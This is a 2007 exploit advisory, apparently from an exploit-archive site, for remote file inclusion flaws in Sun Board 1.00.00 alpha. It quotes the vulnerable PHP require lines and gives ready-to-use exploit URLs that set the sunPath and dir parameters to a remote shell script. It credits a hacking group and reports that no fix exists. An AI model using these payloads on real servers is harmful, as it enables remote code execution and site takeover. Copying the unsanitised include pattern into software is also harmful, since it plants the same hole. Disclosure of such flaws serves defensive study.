Sun Board 1.00.00 alpha Remote File Inclusion Vulnerabilities

2007-06-22 00:00:00

# Sun Board 1.00.00 Alpha Multiple Remote File Inclusion Vulnerabilities

# D.Script :
http://mesh.dl.sourceforge.net/sourceforge/sunboard/sunboard.zip

# V.Code :
require $sunPath.'config.php';
require_once $sunPath.'dbms/'.$dbtype.'.php';
# In :
/include.php

# Exploits :
/include.php?sunPath=Shell.txt?

# V.Code 2 :
<?php require_once $dir.'/lib.php'; ?>

# In :
/skin/board/default/doctype.php

# Exploits 2 :
/skin/board/default/doctype.php?dir=Shell.txt?

# Discovered by:
GoLd_M = [Mahmood_ali]

# Homepage:
http://www.Tryag.Com/cc

# Sp.Thanx To :
Tryag-Team & Asb-May's Group

#

Fixes

No fixes

In order to submit a new fix you need to be registered.